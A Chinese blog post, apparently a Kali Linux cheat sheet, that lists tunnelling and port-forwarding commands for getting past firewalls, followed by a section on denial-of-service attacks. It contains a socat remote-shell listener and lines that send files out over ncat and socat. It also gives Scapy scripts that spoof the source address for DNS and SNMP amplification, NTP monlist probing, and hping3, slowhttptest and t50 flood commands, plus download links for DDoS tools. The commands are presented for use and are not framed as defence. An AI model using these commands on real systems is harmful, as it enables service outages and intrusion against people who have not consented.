流量攻击

最新推荐文章于 2024-05-31 09:02:01 发布
最新推荐文章于 2024-05-31 09:02:01 发布
阅读量626 收藏 1
点赞数
分类专栏: kali 文章标签: 流量攻击
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40237472/article/details/103343686
版权

        Rinetd重定向
1.    安装rinetd:apt-get install rinetd
2.    配置:/etc/rinetd.conf文件中输入bindadd bindport connectadd connectport4个参数即:侦听主机ip,侦听端口,转发主机,转发端口
3.    运行:rinetd:
a)    查看运行进程:ps aux | grep rinetd,
b)    杀掉进程:pkill rinetd,
c)    查看端口:netstat –pantu | grep :53.
SSH本地端口转发
1. 修改配置文件,可使用root账号,更改/etc/ssh/sshd_config文件。
     –PermitRootLogin yes
 – Port 53 
– PasswordAuthentication yes
2.本地 启动SSH侦听:service ssh start,查看53端口:netstat –pantu | grep :53
▪ ssh -fCNg -L <listen port>:<remote ip>:<remote port> user@<sshserver> -p <ssh server port>
▪ ssh -fCNg -L <listen port>:localhost:<remote port> user@<sshserver> -p <ssh port>
        SSH远程端口转发
1.    远程服务器开启SSH,开启侦听:
a)     ▪ ssh -fNg -R <listen port>:<remote ip>:<remote port> user@<SSH server> -p
<ssh server port>
协议隧道(穿透防火墙)
1.    dns2tcpd隧道,修改服务端配置文件:/etc/dns2tcpd.conf
Listen  = 0.0.0.0 ,                                                                            port = 53 ,                                                                                 user = nobody,                                                                                  chroot = /tmp ,                                                                                   key = password123 ,                                         domain=test.lab.com,resources = ssh:127.0.0.1:22,smtp:127.0.0.1:25,socks:127.0.0.1:1082,https:127.0.0.1:8087,http:127.0.0.1:3128
2.    服务器启动命令:dns2tcpd –F –d 1 –f /etc/dns2tcpd.conf 
3.    客户端通过使用不同协议连接服务器如SSH连接命令:                                 dns2tcpc -c -k pass -d 1 -l 2222 -r ssh -z test.lab.com                                            会被服务端dns2tcpd.conf配置文件中配置的resources重定向到服务器指定的22端口转发。
4.    iodine隧道:
a)    方法一:
i.    创建服务端隧道网卡:iodined –f –c 10.0.0.1 test.lab.com
ii.    客户端连接隧道:iodine –f test.lab.com
iii.    使用ping 10.0.0.1是否通过防火墙建立连接。
iv.    使用ssh连接:ssh -CfNg -D 7001 root@10.0.0.1
b)    方法二:
i.    服务端安装tap网卡驱动:        https://openvpn.net/index.php/open-source/downloads.html
ii.    Widows客户端:                                                                             – http://code.kryo.se/iodine/                                                                    – iodine -f test.lab.com
5.    Ncat功能:
a)    代理:ncat -l 8080 --proxy-type http --proxy-auth user:pass
b)    连接broker方式:                                    服务端:ncat -l 333 –broker                             客户端:ncat 1.1.1.1 --sh-exec "echo `pwd`“
c)    文件传输:ncat --send-only 1.1.1.1 333 < inputfile
6.    Socat功能:
a)    远程shell获取:                                    服务端: socat tcp-l:23 exec:sh,pty,stderr                    客户端 连接端口获取shell:Socat - tcp:1.1.1.1:23
b)    远程执行命令:
i.    服务器:socat - udp-l:2001
ii.    客户端:echo “`id`” | socat - udp4-datagram:1.1.1.1:2001
c)    端口转发:socat tcp4-listen:22,fork tcp4:1.1.1.1:22
d)    连接端口:Socat - tcp:1.1.1.1:80
e)    侦听端口:socat - tcp4-listen:22 / socat - tcp-l:333
f)    发送文件:cat 1.txt | socat - tcp4:1.1.1.1:333
g)    接受文件:socat tcp4-listen:333 open:2.txt,creat,append
h)    Udp全端口任意内容发包:                               命令:for PORT in {1..65535}; do echo “aaaaa" | socat - UDP4-DATAGRAM: 1.1.1.1:$PORT; sleep .1; done
命令:echo “’id’” |socat – udp-datagram:192.168.0.110:2000
i)    二进制编辑器:                                       echo -e "\0\14\0\0\c" | socat -u - file:/usr/bin/ squid.exe,seek,seek=0x00074420
j)    简单的web服务器:                                                                               socat -T 1 -d -d TCP-L:10081,reuseaddr,fork,crlf SYSTEM:"echo -e \"\\ \"HTTP/1.0 200 OK\\\nDocumentType: text/plain\\\n\\\ndate: \$\(date\)\\ \nserver:\$SOCAT_SOCKADDR:\$SOCAT_SOCKPORT\\\nclient: \ $SOCAT_PEERADDR:\$SOCAT_PEERPORT\\\n\\\"\"; cat; echo -e \"\\\"\\\n\ \\"\""
7.    Ptunnle命令,通过ping实现隧道:
a)    服务器:ptunnel -x 1234
b)    客户端:sudo ptunnel -p proxy -lp 2222 -da destination -dp 22 -x 1234
c)    嵌套SSH隧道:ssh -CNfg -D 7000 root@127.0.0.1 -p 2222
8.    Proxytunnle命令:    
方法一:                                            1.内网安装squid3代理、proxytunnle:                           vi /etc/squid3/squid.conf                                     /^http_port                                         /^http_access                                        /^ac                                        2. 创建隧道:proxytunnle -a 80 -p 127.0.0.1:3128 -d 192.168.1.1:80
方法二:    
1.    外网安装squid3代理服务器并侦听80端口:
2.    创建隧道:proxytunnle -a 80 -p 127.0.0.1:3128 -r 192.168.1.1:80 -d 192.168.1.1:22
     方法三:
1.    SSH客户端配置自动创建代理:                            vi ~/.ssh/config                             Host 192.168.1.1                                       Hostname 192.168.1.1                     ProtocolKeepAlives 30                                 ProxyCommand /usr/bin/proxytunnel -p 1.1.1.1:3128 -r 192.168.1.1:80 -d %h:%p
9.    sslh端口分配器:vim /etc/default/sslh,                             RUN-yes                                         DAEMON=/usr/sbin/sslh                     DAEMON_OPTS=”--user sslh --listen 1.1.1.10:443 --ssh 127.0.0.1:22 --ssl 1.1.1.11:443 --http 127.0.0.0:80 --pidfile /var/run/sslh/sslh.pid”    
10.    stunnel4服务器:                                        a) 生成证书:openssl req -new –days 365 -nodes -x509 -out /etc/stunnel/  stunnel.pem -keyout /etc/stunnel/stunnel.pem                        b) 创建配置文件:
i.    cert = /etc/stunnel/stunnel.pem 
ii.    ▪ setuid = stunnel4
iii.    ▪ setgid = stunnel4 
iv.    ▪ pid = /var/run/stunnel4/stunnel4.pid 
v.    ▪ [mysqls] 
vi.    ▪ accept = 0.0.0.0:443 
vii.    ▪ connect = 1.1.1.11:3306
c) 自动启动:– /etc/default/stunnel4,▪ ENABLED=1
d) 启动stunnel4服务端:service stunnel4 start    
e)客户端配置(kali自带):
    创建配置文件:/etc/stunnel/stunnel.conf
        ▪ client = yes 
▪ [mysqls] 
▪ accept = 3306 
▪ connect = 192.168.1.11:443
        f)客户端自启:/etc/default/stunnel4,▪ ENABLED=1    
        g)启动客户端:– service stunnel4 stop / start   
            流量攻击DOS
1.    发送ip数据包:
a)    scapy,i=IP(),i.dst=’192.168.0.119’,t=TCP(),t.dport=22,sr1(i/t,verbose=1,timeout=2)
2.    抓包工具wireshark过滤抓包:ip.addr eq 192.168.0.111
3.    DOS攻击:通过发送请求3次握手建立连接,使用iptables规则丢弃对方响应数据包从而达到对方保持短时间持续连接占用资源的效果。            iptables -A OUTPUT -p TCP --tcp-flags rst rst -d 1.1.1.1 -j DROP
4.    DNS攻击:通过向dns发送数据包访问各种服务器,将数据包响应地址改为目标主机ip。通过响应数据包堵死目标主机。    Scapy构造数据包:            i=IP() i.dst="202.106.0.20" i.src="1.1.1.1" i.display()            u=UDP() u.display() u.dport                         d=DNS() d.rd=1 d.qddount=1 d.display()                 q=DNSQR() q.qname='hp.com' q.qtype=255 q.display()         d.qd=q d.display()                                 r= (i/u/d) r.display() r                         sr1(r) send(r)
5.    Snmp网络协议管理站攻击:通过向snmp服务端发送数据包请求,伪造源地址,snmp响应给攻击目标。到达攻击效果。                        i=IP() i.dst=“1.1.1.1" i.display()                         u=UDP() u.dport=161 u.sport=161                     s=SNMP() s.community= 'public' s.display()             b=SNMPbulk() b.display()                     b.max_repetitions = 100     b.varbindlist=[SNMPvarbind(oid=ASN1_OID('1.3.6.1.2.1.1')),    SNMPvarbind(oid=ASN1_OID(' 1.3.6.1.2.1.19.1.3'))]         s.PDU=b snmp.display()                             r= (i/u/s) r.display()                             Sr1(r) send(r)
6.    通过时间服务器发动攻击:                                查看开发ntp端口:    nmap -sU -p123 1.1.1.1 / 127.0.0.1            发现漏洞:                                        ntpdc -n -c monlist 1.1.1.1                             ntpq -c rv 1.1.1.1                                 ntpdc -c sysinfo 192.168.20.5                        开启ntp服务(注释掉):/etc/ntp.conf                         restrict -4 default kod nomodify notrap nopeer noquery             restrict -6 default kod nomodify notrap nopeer noquery
7.    应用层dos慢速攻击:最大并发ulimite -n 70000,apt-get install slowhttptest,    http post攻击模式:slowhttptest -c 1000 -B -g -o body_stats -i 110 -r 200 -s 8192 -t FAKEVERB -u http://1.1.1.1 -x 10 -p 3                slowloris攻击模式:slowhttptest -c 1000 -H -g -o header_stats -i 10 -r 200 -t GET -u http:// 1.1.1.1 -x 24 -p 3
8.    Hping3攻击:可以定制发送任何tcp/ip数据包。                   Syn flood攻击:                                hping3 -c 1000 -d 120 -S -w 64 -p 80 --flood --rand-source 1.1.1.1        hping3 -S -P -U -p 80 --flood --rand-source 1.1.1.1                hping3 -SARFUP -p 80 --flood --rand-source 1.1.1.1 (TCP FLOOD)ICMP Flood攻击:hping3 -q -n -a 1.1.1.1 --icmp -d 56 --flood 1.1.1.2         UDP Flood攻击:hping3 -a 1.1.1.1 --udp -s 53 -d 100 -p 53 --flood 1.1.1.2 LAND攻击:hping3 -n -a 1.1.1.1 -S -d 100 -p 80 --flood 1.1.1.1           TCPDos攻击:nping --tcp-connect --rate=10000 -c 1000000000 -q 1.1.1.1  查公网IP:nping --echo-client "public" echo.nmap.org –udp
9.    Siege(压力测试http/https)工具:模拟多个用户请求。                siege -g http://1.1.1.1/a.php / 1.1.1.1                 siege -i -c 1000                                ▪ /etc/siege/urls.txt(-f参数指定字典)
10.    T50 网络压力测试:                                     t50 1.1.1.1 --flood --turbo -S --protocol TCP --dport 80              t50 1.1.1.1 --flood --turbo -S TCP UDP OSPF EIGRP --dport 22
11.    匿名者(拒绝服务攻击组织)发布的DOS工具:LOIC 、 HOIC 、 DDoSer、DDOSIM、GoldenEye                                   其他拒绝服务工具:XOIC                                  攻击任意IP地址的指定端口:                            – git clone git://git.code.sf.net/p/xoic/code xoic-code             – https://xoicdoser.wordpress.com/                        – 三种模式:test、normal、Dos Attack                    – 支持协议:TCP/HTTP/UDP/ICMP                        HULK - Http Unbearable Load King:                        – https://packetstormsecurity.com/files/download/112856/hulk.zip


 

童心(成都)
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DDOS流量攻击
一凡凡凡人的博客
10-31 1万+
实验目的 学习基本的DDOS工具使用 hping3 netsniffer – trafgen 实验环境 包含2台主机 attact 作为攻击方,使用Centos7.2 windows_server ,用于被攻击,同时抓包分析流量 ,任意版本均可。安装wireshark,用于抓包 实验步骤 使用hping hping官网帮助信息 hping与ping的区别:典型的ping程序使用的是ICMP回显...
什么是DDOS流量攻击,DDoS防护手段
weixin_67757219的博客
04-15 5686
什么是DDOS流量攻击?全称Distributed Denial of Service,中文意思为“分布式拒绝服务”,主要是利用大量合法的分布式服务器对目标发送请求,从而导致正常合法用户无法获得服务。通俗讲就是利用网络节点资源如:个人PC、IDC服务器、手机、智能设备、打印机、摄像头等对目标发起大量攻击请求,从而导致服务器拥塞而无法对外提供正常服务,只能宣布game over,详细描述如下图所示: 2、黑客为什么选择DDoS 不同于其他恶意篡改数据或劫持类攻击,DDoS简单粗暴,可以达到直接摧毁目标
网站被流量攻击
m0_67852911的博客
03-15 290
网站、APP,以及服务器每天都会遭受到DDOS流量攻击,据统计,目前互联网2019年上半年的流量攻击趋势明显增加,每天接触到的流量攻击事件达到两千多次,与去年的攻击数据相比较有所微上升。国内大部分的网站,APP应用都使用的是阿里云,以及腾讯云,百度云的服务器,通过上述三家公开的一些流量攻击报告,从流量攻击事件,挖矿病毒,僵尸肉鸡,网站篡改攻击事件中。 1、定期扫描 定期扫描现有网络主节点,清点可能存在的安全漏洞,及时清理新漏洞。由于带宽较高,骨干节点上的计算机最适合黑客,因此加强这些主机本身的主机安全性
常见攻击流量
hakksjss的博客
05-31 793
软waf:过滤规则写在代码中;
面对流量型DDOS攻击不知所措?这几种DDOS防护手段你需要知道
weixin_51110871的博客
12-25 1188
我们知道DDOS攻击是通过各种手段消耗网络带宽和系统CPU、内存、连接数等资源,直接造成网络带宽耗尽或系统资源耗尽,使得该目标系统无法为正常用户提供业务服务,从而导致拒绝服务。常规流量型的DDOS防护方式因其选择的引流技术不同而在实现上有不同的差异性,主要分为以下几种方式,实现分层清洗的效果。 1.本地DDOS防护设备 一般恶意组织发起DDOS攻击时,率先感知并起作用的一般为本地数据中心内的DDOS防护设备,金融机构本地防护设备较多采用旁路镜像部署方式。本地DDOS防护设备一般分为DDOS检测设备、清洗设备
流量攻击及防范
海绵汽水的博客
02-26 1270
流量攻击(超过阀值后进行防护操作) SYN flood攻击 : 基于传输层的源合法性验证技术,SYN+ACK时回复一个错误的序列号: 正常用户,发现错误ACK,重新发送RST进行重新连接 非法用户:不回复RST和ACK,加入黑名单 SYN-ACKACK flood 攻击: 通过流量阀值进行检测,并进行会话检查。 载荷检测,如果载荷内容全一致。 FIN/RST flood ...
流量攻击攻击服务器还是攻击的网站,如何防御网站被ddos攻击 首先要了解什么是流量攻击...
weixin_28767599的博客
08-06 603
提要:什么是DDOS流量攻击?我们大多数人第一眼看到这个DDOS就觉得是英文的,有点难度,毕竟是国外的,其实简单通俗来讲,DDOS攻击是利用带宽的流量攻击服务器以及网站。UDP-flood是属于UDP协议中的一种流量攻击攻击特征是伪造大量的真实IP并发送小数量的数据包对要攻击的服务器进行发送,只要服务器开启UDP的端口就会受到流量攻击。SSL流量攻击如何防御:禁用Renegotiating的安...
Nginx防止流量攻击的配置详解
09-30
本文将详细解析如何配置Nginx以防止流量攻击,主要包括限制请求速率、控制并发连接数以及自定义错误页面。 首先,我们要理解Nginx防止流量攻击的核心机制,即限流。限流可以通过Nginx的`limit_req`模块实现,它可以...
网站被流量攻击怎么处理
xyyaq的博客
04-22 1982
网站、APP,以及服务器每天都会遭受到DDOS流量攻击,据统计,目前互联网2019年上半年的流量攻击趋势明显增加,每天接触到的流量攻击事件达到两千多次,与去年的攻击数据相比较有所微上升。国内大部分的网站,APP应用都使用的是阿里云,以及腾讯云,百度云的服务器,通过上述三家公开的一些流量攻击报告,从流量攻击事件,挖矿病毒,僵尸肉鸡,网站篡改攻击事件中。 1、定期扫描 定期扫描现有网络主节点,清点可能存在的安全漏洞,及时清理新漏洞。由于带宽较高,骨干节点上的计算机最适合黑客,因此加强这些主机本身的.
ddos防流量攻击
08-05
centos,linux使用ddos的防止流量攻击。 一般的vps小服务器使用 小范围的阻止
现在的黑客太可恶了为了流量攻击我的网站
沧海桑田
07-24 1798
这两天我检查了一下我的网站排名相关情况,又发现了一个之前我没有遇到的问题。那就是关于黑客攻击这东西,太可恶了。我的网站有排名但是被黑客攻击了,通过百度搜索到排名以后呢,点击进去以后便跳转到别的网站上去了,而当我直接输入网站访问网站的时候却没有跳转。简直太不像话了,搞这种小人非法行为的东西,鄙视他们。由于这两天太忙了,还没有时间处理一下,我想我只能是先让他们卯是卯一段时间了,解决问题的方案肯定有的,
总结:WEB流量劫持
w2009211777的专栏
07-14 1344
劫持
针对网页流量的Dos攻击脚本(使用代理服务器)
Yatere的天平秤
05-29 1991
某目标网站,为虚拟主机,如果ISP限制月流量为20G,那么我们可以在短暂1-2天内消耗完其流量。(取决于你的机器) 方法原理如下: 1.找到目标网站大文件(页面)地址 2.多线程访问(下载)该地址 (注意:由于完全是出于模拟真实用户,所以不会被防火墙屏蔽掉) (以下以hao123为例子而已) 一: 其中以上思路中的第一点 可以通过google浏览器的审计功能实现
网页攻击教学
网络
09-18 1023
前叙∶ 这项技术是在没多久以前台湾所流行的攻击法,你知道利用漏洞的厉害在哪吗?这一项教学就是利用微软  ( Microsoft )的IE浏览器( Internet Explorer )所衍生出来的攻击方法。 教学开始∶ 以下这段就是具有破坏性的HTML Hacking Your Computer . scr.Reset(); scr.Path="C:\\WINDOWS\\Start Menu\\P
DDOS攻击(流量攻击)防御步骤
weixin_30822451的博客
04-14 367
DDOS全名是DistributedDenialofservice(分布式拒绝服务攻击),很多DOS攻击源一起攻击某台服务器就组成了DDOS攻击,DDOS最早可追溯到1996年最初,在中国2002年开始频繁出现,2003年已经初具规模. DDoS攻击简介:   DDoS的攻击方式有很多种,最基本的DoS攻击就是利用合理的服务请求来占用过多的服务资源,从而使服务器无法处理合法用户的指令...
kali DDOS(流量攻击
qq_33391644的博客
12-30 4408
首先从Github克隆到本地: 命令: git clone https://github.com/Ha3MrX/DDos-Attack 然后进入DDos-Attack这个目录:(以后用到dos攻击直接从这一步开始) cd DDos-Attack 接着给ddos-attack.py设置权限: chmod +x ddos-attack.py ping一下网站的ip,如果没有域名...
服务器如何解决被流量攻击
smonai的博客
08-02 1283
近两年在新冠疫情的影响下,大多数的行业或多或少都收到了一定的影响,互联网行业做为影响较小的行业之一有一定的优势,但却躲不过投机的黑客。小蚁团队近期遇到很多因为项目遭受ddos流量攻击导致服务器进入黑洞来咨询的客户。甚至很多客户都是对ddos和服务器黑洞是完全都不懂的,可想而知当他们遭受到ddos流量攻击的时候肯定也是无计可施。今天就给大家说说当我们的服务器遭受到流量攻击的时候我们到底该如何处理。 像国内阿里云、腾讯云、华为云等等的服务器都是只有自带的5g基础防护,在现如今ddos攻击泛滥的时代,5g的
kaliddos大流量攻击
最新发布
07-12
Kaliddos是一种云防护服务,旨在帮助企业抵御DDoS(分布式拒绝服务)攻击。大流量攻击通常是DDoS攻击的一种形式,它通过发送大量的请求流量,超出目标服务器的处理能力,导致正常用户的访问受到影响。Kaliddos通过部署全球的高防节点、负载均衡和智能路由技术,来检测、分析和过滤恶意流量,保护客户的在线服务不受损害。 如果遭遇大流量攻击, Kaliddos会启用其防御策略,比如黑洞路由、IP封禁和流量清洗,同时提供实时监控报告,帮助用户了解攻击情况并采取应对措施。企业用户可以在遇到此类事件时联系Kaliddos客服,获取专业支持。 请注意,预防和应对这类攻击的最佳做法还是提前做好充足的防护措施,包括但不限于使用防火墙规则、更新软件补丁和实施安全策略。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值